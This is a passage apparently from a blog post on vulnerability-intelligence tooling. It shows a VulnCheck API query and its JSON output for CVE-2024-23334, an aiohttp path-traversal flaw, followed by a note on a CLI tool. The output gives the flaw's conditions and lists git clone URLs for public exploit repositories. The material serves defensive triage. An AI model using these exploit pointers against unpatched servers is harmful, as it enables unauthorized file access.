                  "matchCriteriaId": "CC18B2A9-9D80-4A6E-94E7-8FC010D8FC70"
                }
              ]
            }
          ]
        },
        {
          "nodes": [
            {
              "operator": "OR",
              "cpeMatch": [
                {
                  "vulnerable": true,
                  "criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*",
                  "matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646"
                }
              ]
            }
          ]
        }
      ],
      "_timestamp": "2024-02-09T05:33:33.170054Z"
    }
  ]
}

VulnCheck’s Extended KEV

curl \
  --silent \
  --cookie "token=${VULNCHECK_API_KEY}" \
  --header 'Accept: application/json' \
  --url "https://api.vulncheck.com/v3/index/vulncheck-kev?cve=CVE-2024-23334" | jq
{
  "_benchmark": 0.328855,
  "_meta": {
    "timestamp": "2024-03-23T08:47:41.025967418Z",
    "index": "vulncheck-kev",
    "limit": 100,
    "total_documents": 1,
    "sort": "_id",
    "parameters": [
      {
        "name": "cve",
        "format": "CVE-YYYY-N{4-7}"
      },
      {
        "name": "alias"
      },
      {
        "name": "iava",
        "format": "[0-9]{4}[A-Z-0-9]+"
      },
      {
        "name": "threat_actor"
      },
      {
        "name": "mitre_id"
      },
      {
        "name": "misp_id"
      },
      {
        "name": "ransomware"
      },
      {
        "name": "botnet"
      },
      {
        "name": "published"
      },
      {
        "name": "lastModStartDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "lastModEndDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "pubStartDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "pubEndDate",
        "format": "YYYY-MM-DD"
      }
    ],
    "order": "desc",
    "page": 1,
    "total_pages": 1,
    "max_pages": 6,
    "first_item": 1,
    "last_item": 1
  },
  "data": [
    {
      "vendorProject": "aiohttp",
      "product": "aiohttp",
      "shortDescription": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.  Disabling follow_symlinks and using a reverse proxy are encouraged mitigations.  Version 3.9.2 fixes this issue.",
      "vulnerabilityName": "aiohttp aiohttp Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')",
      "required_action": "Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.",
      "knownRansomwareCampaignUse": "Known",
      "cve": [
        "CVE-2024-23334"
      ],
      "vulncheck_xdb": [
        {
          "xdb_id": "231b48941355",
          "xdb_url": "https://vulncheck.com/xdb/231b48941355",
          "date_added": "2024-02-28T22:30:21Z",
          "exploit_type": "infoleak",
          "clone_ssh_url": "git@github.com:ox1111/CVE-2024-23334.git"
        },
        {
          "xdb_id": "f1d001911304",
          "xdb_url": "https://vulncheck.com/xdb/f1d001911304",
          "date_added": "2024-03-19T16:28:56Z",
          "exploit_type": "infoleak",
          "clone_ssh_url": "git@github.com:jhonnybonny/CVE-2024-23334.git"
        }
      ],
      "vulncheck_reported_exploitation": [
        {
          "url": "https://cyble.com/blog/cgsi-probes-shadowsyndicate-groups-possible-exploitation-of-aiohttp-vulnerability-cve-2024-23334/",
          "date_added": "2024-03-15T00:00:00Z"
        }
      ],
      "date_added": "2024-03-15T00:00:00Z",
      "_timestamp": "2024-03-23T08:27:47.861266Z"
    }
  ]
}

vccve

There’s a project on Codeberg that has code and binaries for macOS, Linux, and Windows for a small CLI that gets you combined extended KEV and NVDv2 information all in one call.

The project README has examples and installation instructions.